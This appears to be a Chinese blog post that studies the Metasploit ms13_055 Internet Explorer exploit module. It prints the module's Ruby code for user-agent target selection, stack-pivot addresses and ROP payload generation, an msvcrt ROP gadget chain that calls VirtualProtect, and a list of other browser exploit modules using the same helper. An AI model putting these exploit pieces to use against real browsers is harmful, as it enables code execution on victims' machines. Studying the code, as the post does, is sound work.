111   def get_payload(t)
112 if t['Rop'] == :msvcrt
113 print_status("Using msvcrt ROP")
114 esp_align = "\x81\xc4\x54\xf2\xff\xff"
115 rop_dll = 'msvcrt'
116 opts = {'target'=>'xp'}
117 else
118 print_status("Using JRE ROP")
119 esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
120 rop_dll = 'java'
121 opts = {}
122 end

  

daniel@daniel-mint ~/ms13_055 $ echo "81 c4 54 f2 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s inte
l00000000 81 C4 54 F2 FF FF add esp, 0xFFFFF254

  

daniel@daniel-mint ~/ms13_055 $ echo "81 ec f0 d8 ff ff" | ascii2binary -b h -t uc | x86dis -e 0 -s intel
00000000 81 EC F0 D8 FF FF sub esp, 0xFFFFD8F0

  

esp_align代表的汇编语句的作用是对齐esp,即栈指针。


 87   def get_target(agent)
88 return target if target.name != 'Automatic'
89
90 nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
91 ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
92
93 ie_name = "IE #{ie}"
94
95 case nt
96 when '5.1'
97 os_name = 'Windows XP SP3'
98 when '6.1'
99 os_name = 'Windows 7'
100 end
101
102 targets.each do |t|
103 if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
104 return t
105 end
106 end
107
108 nil
109 end

  

188   def on_request_uri(cli, request)
189 agent = request.headers['User-Agent']
190 t = get_target(agent)

  

当远程的网页客户端发出HTTP请求页面时,get_target会根据请求Header中的User-Agent信息来了解客户端操作系统以及浏览器的版本情况,然后根据预设的情况来

返回与版本相关的数据

 52       'Targets'        =>
53 [
54 [ 'Automatic', {} ],
55 [
56 'IE 8 on Windows XP SP3',
57 {
58 'Rop' => :msvcrt,
59 'Pivot' => 0x77c15ed5, # xchg eax, esp; ret
60 'Align' => 0x77c4d801 # add esp, 0x2c; ret
61 }
62 ],
63 [
64 'IE 8 on Windows 7',
65 {
66 'Rop' => :jre,
67 'Pivot' => 0x7c348b05, # xchg eax, esp; ret
68 'Align' => 0x7C3445F8 # add esp, 0x2c; ret
69 }
70 ]
71 ],

  

如果当前的系统不支持,就会返回404页面。


111   def get_payload(t)
112 if t['Rop'] == :msvcrt
113 print_status("Using msvcrt ROP")
114 esp_align = "\x81\xc4\x54\xf2\xff\xff"
115 rop_dll = 'msvcrt'
116 opts = {'target'=>'xp'}
117 else
118 print_status("Using JRE ROP")
119 esp_align = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
120 rop_dll = 'java'
121 opts = {}
122 end
123
124 p = esp_align + payload.encoded + rand_text_alpha(12000)
125 generate_rop_payload(rop_dll, p, opts)
126 end

  

generate_rop_payload

 77   def generate_rop_payload(rop, payload, opts={})
78 nop = opts['nop'] || nil
79 badchars = opts['badchars'] || ''
80 pivot = opts['pivot'] || ''
81 target = opts['target'] || ''
82 base = opts['base'] || nil
83
84 rop = select_rop(rop, {'target'=>target, 'base'=>base})
85 # Replace the reserved words with actual gadgets
86 rop = rop.map {|e|
87 if e == :nop
88 sled = (nop) ? nop.generate_sled(4, badchars).unpack("V*")[0] : 0x90909090
89 elsif e == :junk
90 Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
91 elsif e == :size
92 payload.length
93 elsif e == :unsafe_negate_size
94 get_unsafe_size(payload.length)
95 elsif e == :safe_negate_size
96 get_safe_size(payload.length)
97 else
98 e
99 end
100 }.pack("V*")
101
102 raise RuntimeError, "No ROP chain generated successfully" if rop.empty?
103
104 return pivot + rop + payload
105 end

  

会从data目录下查找定义好的[module].xml的文件,然后将gadgets中的宏定义展开,然后与pivot + gadgets + payload返回。

  3 <rop>
4 <compatibility>
5 <target>WINDOWS XP SP2</target>
6 <target>WINDOWS XP SP3</target>
7 </compatibility>
8
9 <gadgets base="0x77c10000">
10 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
11 <gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
12 <gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
13 <gadget value="junk">JUNK</gadget>
14 <gadget offset="0x0001362c">POP EBX # RETN</gadget>
15 <gadget offset="0x0004d9bb">Writable location</gadget>
16 <gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
17 <gadget offset="0x00040d13">POP EDX # RETN</gadget>
18 <gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
19 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
20 <gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
21 <gadget value="junk">JUNK</gadget>
22 <gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
23 <gadget offset="0x0002ee15">POP EBP # RETN</gadget>
24 <gadget offset="0x0002ee15">skip 4 bytes</gadget>
25 <gadget offset="0x0002eeef">POP ECX # RETN</gadget>
26 <gadget offset="0x0004d9bb">Writable location</gadget>
27 <gadget offset="0x0001a88c">POP EDI # RETN</gadget>
28 <gadget offset="0x00029f92">RETN (ROP NOP)</gadget>
29 <gadget offset="0x0002a184">POP ESI # RETN</gadget>
30 <gadget offset="0x0001aacc">JMP [EAX]</gadget>
31 <gadget offset="0x0002b860">POP EAX # RETN</gadget>
32 <gadget offset="0x00001120">ptr to VirtualProtect()</gadget>
33 <gadget offset="0x00002df9">PUSHAD # RETN</gadget>
34 <gadget offset="0x00025459">ptr to 'push esp # ret</gadget>
35 </gadgets>
36 </rop>

  


在查找Windows下Browser相关的ROP漏洞

daniel@daniel-mint ~/msf/metasploit-framework/modules/exploits/windows/browser $ grep generate_rop_payload *.rb -n
adobe_flash_mp4_cprt.rb:148: code = generate_rop_payload(rop_name, code, {'target'=>rop_target})
adobe_flash_otf_font.rb:100: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.257', 'pivot'=>pivot})
adobe_flash_otf_font.rb:110: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.265', 'pivot'=>pivot})
adobe_flash_otf_font.rb:120: p = generate_rop_payload('flash', payload.encoded, {'target'=>'11.3.300.268', 'pivot'=>pivot})
adobe_flash_otf_font.rb:130: p = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
adobe_flashplayer_flash10o.rb:194: p = generate_rop_payload('java', payload.encoded)
adobe_flash_rtmp.rb:135: code << generate_rop_payload('msvcrt', p, {'target'=>'xp'})
adobe_toolbutton.rb:77: rop_10 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '10' }))
adobe_toolbutton.rb:78: rop_11 = Rex::Text.to_unescape(generate_rop_payload('reader', '', { 'target' => '11' }))
aladdin_choosefilepath_bof.rb:147: p = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp'})
apple_quicktime_mime_type.rb:153: code = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
apple_quicktime_rdrf.rb:65: p = generate_rop_payload('msvcrt', alignment + payload.encoded, {'target'=>'xp'})
crystal_reports_printcontrol.rb:178: rop_payload = generate_rop_payload('java', code, {'pivot' => [t['Pivot']].pack("V")})
hp_loadrunner_writefilebinary.rb:207: rop_payload = fake_object + generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
ie_cbutton_uaf.rb:148: rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'xp'})
ie_cbutton_uaf.rb:150: rop_payload = generate_rop_payload('msvcrt', msvcrt_align + code, {'target'=>'2003'})
ie_cbutton_uaf.rb:153: rop_payload = generate_rop_payload('java', java_align + code)
ie_cgenericelement_uaf.rb:126: rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})
ie_cgenericelement_uaf.rb:128: rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})
ie_cgenericelement_uaf.rb:136: rop_payload = generate_rop_payload('java', code)
ie_execcommand_uaf.rb:139: rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
ie_execcommand_uaf.rb:158: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ie_setmousecapture_uaf.rb:98: rop = generate_rop_payload('hxds', code, { 'target'=>'2007' })
ie_setmousecapture_uaf.rb:112: rop = generate_rop_payload('hxds', code, { 'target'=>'2010' })
indusoft_issymbol_internationalseparator.rb:219: rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
indusoft_issymbol_internationalseparator.rb:231: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
inotes_dwa85w_bof.rb:204: rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})#{'pivot'=>stack_pivot, 'target'=>'xp'})
mozilla_firefox_onreadystatechange.rb:108: code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
mozilla_firefox_xmlserializer.rb:110: code << generate_rop_payload('msvcrt', stack_pivot + payload.encoded, {'target'=>'xp'})
ms10_002_ie_object.rb:248: rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'xp'})
ms10_002_ie_object.rb:250: rop_payload = generate_rop_payload('java', p)
ms11_050_mshtml_cobjectelement.rb:182: rop_payload = generate_rop_payload('java', p)
ms11_081_option.rb:137: rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
ms11_081_option.rb:144: rop_payload = generate_rop_payload('java', '')
ms12_004_midi.rb:519: generate_rop_payload('msvcrt', p, {'pivot'=>padding, 'target'=>'xp'})
ms12_037_same_id.rb:133: rop = generate_rop_payload('msvcrt', '', {'target'=>'xp', 'pivot'=>pivot})
ms12_037_same_id.rb:137: rop = generate_rop_payload('java', '', {'pivot'=>pivot})
ms13_009_ie_slayoutrun_uaf.rb:128: rop_payload = generate_rop_payload('msvcrt', "", {'target'=>'xp'})
ms13_037_svg_dashstyle.rb:218: rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ms13_055_canchor.rb:125: generate_rop_payload(rop_dll, p, opts)
ms13_059_cflatmarkuppointer.rb:120: generate_rop_payload('java', code, {'pivot'=>stack_pivot})
ms13_069_caret.rb:97: p << generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp'})
ms13_080_cdisplaypointer.rb:157: rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:174: rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:186: rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot})
ms13_080_cdisplaypointer.rb:197: rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})
ms13_090_cardspacesigninhelper.rb:108: rop_payload = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp', 'pivot' => stack_pivot})
ms14_012_textrange.rb:85: p = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>setup})
msxml_get_definition_code_exec.rb:189: rop = generate_rop_payload('msvcrt','',{'target'=>'xp', 'pivot'=>adjust})
msxml_get_definition_code_exec.rb:193: rop = generate_rop_payload('java','',{'pivot'=>adjust})
novell_groupwise_gwcls1_actvx.rb:207: rop_payload = generate_rop_payload('msvcrt', '', 'target'=>'xp') # Mapped at 0x0c0c07ea
novell_groupwise_gwcls1_actvx.rb:217: rop_payload = generate_rop_payload('java', '') # Mapped at 0x0c0c07ea
ntr_activex_check_bof.rb:270: rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})
ntr_activex_check_bof.rb:274: rop_payload = generate_rop_payload('java', code)
quickr_qp2_bof.rb:202: rop_payload = generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
siemens_solid_edge_selistctrlx.rb:398: return generate_rop_payload('msvcrt', payload.encoded, {'pivot'=> fake_memory, 'target'=>'xp'})
vlc_amv.rb:143: code = generate_rop_payload('java', payload.encoded)

  

ms13_055 metasploit的更多相关文章

  1. Metasploit各版本对比

    功能特性   描述 Metasploit  Framework Metasploit  Community Metasploit  Express Metasploit Pro Pricing     ...

  2. 关于kali2.0rolling中metasploit升级后无法启动问题的解决总结

    最近在学习metasploit的使用,文中提到可以使用msfupdate命令来对metasploit的payload.exploit等进行升级,我就试了一下,没想到升级过程并不麻烦,但升级后却出现了无 ...

  3. [转]初探Metasploit的自动攻击

    1. 科普Metasploit   以前只是个Back Track操作系统(简称:BT) 下的攻击框架,自成继承了后攻击渗透模块,隐隐有成为攻击平台的趋势. 我们都戏称它为美少妇,很简单,msf. 它 ...

  4. 移动安全初探:窃取微信聊天记录、Hacking Android with Metasploit

    在这篇文章中我们将讨论如何获取安卓.苹果设备中的微信聊天记录,并演示如何利用后门通过Metasploit对安卓设备进行控制.文章比较基础.可动手性强,有设备的童鞋不妨边阅读文章边操作,希望能激发大家对 ...

  5. metasploit渗透初探MR.robot(一)

    看了MR.robot,有一种研究渗透技术的冲动, 网上也看了些教程,要从kali linux说起, 下载vmware 12,http://www.vmware.com/go/tryworkstatio ...

  6. metasploit用法

    1.msfconsole 进入metasploit 2.help connect 查看帮助 3.msfcli -h 查看帮助 4.ms08_067_netapi O 字符命令后加“O”,查看配置 5. ...

  7. chapter1 渗透测试与metasploit

    网络对抗技术课程学习 chapter1 渗透测试与metasploit 一.读书笔记 二.渗透测试 通过模拟恶意攻击者的技术与方法进行攻击,挫败目标系统安全控制措施,取得访问控制权,并发现具备业务影响 ...

  8. 原创教程:《metasploit新手指南》介绍及下载

    原创教程:<metasploit新手指南>介绍及下载 1.1 作者简介 这份教程并不是“玄魂工作室”原创,但是我还是要力推给大家.相比那些一连几年都在问“我怎么才能入门”的人而言,我们更欣 ...

  9. kali 2.0 启动metasploit服务

    kali 2.0 已经没有metasploit 这个服务了,所以service metasploit start 的方式不起作用. 在kali 2.0中启动带数据库支持的MSF方式如下: 首先启动po ...

随机推荐

  1. 测开之路十六:@classmethod与@staticmethod

    @classmethod 类方法 和属性一样,所有实例化的对象都共享类方法 @staticmethod 静态方法,可以理解为和类没有任何关系,只是放在了类里面 参数可以任意定义,根据自己的定义传参,也 ...

  2. nginx配置相关问题

    1. nginx配置ssl相关问题 1.1 报错nginx: [emerg] the "ssl" parameter requires ngx_http_ssl_module in ...

  3. 提高redis cluster集群的安全性,增加密码验证

    节点设置密码 1.修改配置文件 在配置文件里面增加密码选项,一定要加上masterauth,不然Redirected的时候会失败. masterauth redispassword requirepa ...

  4. spring boot 尚桂谷学习笔记11 数据访问03 JPA

    整合JPA SpringData 程序数据交互结构图 (springdata jpa 默认使用 hibernate 进行封装) 使用之后就关注于 SpringData 不用再花多经历关注具体各个交互框 ...

  5. JQuery判断radio(单选框)是否选中和获取选中值

    一.设置选中方法 代码如下: $("input[name='名字']").get(0).checked=true; $("input[name='名字']"). ...

  6. angularJS 入门知识

    模块:模块可以定义自己的控制器.服务.工厂类以及指令 模块可以依赖其他模块 模块两大常见错误: 定义模块的时候忘记第二个参数,变成使用模块而不是定义模块 使用模块的时候忘记引用依赖模块

  7. Scrapy框架——安装以及新建scrapy文件

    一.安装 conda install Scrapy   :之后在按y 表示允许安装相关的依赖库(下载速度慢的话也可以借助镜像源),安装的前提是安装了anaconda作为python ,   测试scr ...

  8. Python字典(一)

    数据类型 数据类型划分:可变.不可变 不可变数据类型:元组.bool.int.str  [可哈希] 可变数据类型:list,dict,set [可哈希] 字典格式 dic1={ key(键值):val ...

  9. matplotlib系列——饼图

    import matplotlib.pyplot as plt import numpy as np import matplotlib import sys 1.主体函数 #饼图 def die(l ...

  10. springCloud的使用08-----服务链路追踪(sleuth+zipkin)

    sleuth主要功能是在分布式系统中提供追踪解决方案,并且兼容支持了zipkin(提供了链路追踪的可视化功能) zipkin原理:在服务调用的请求和响应中加入ID,表明上下游请求的关系. 利用这些信息 ...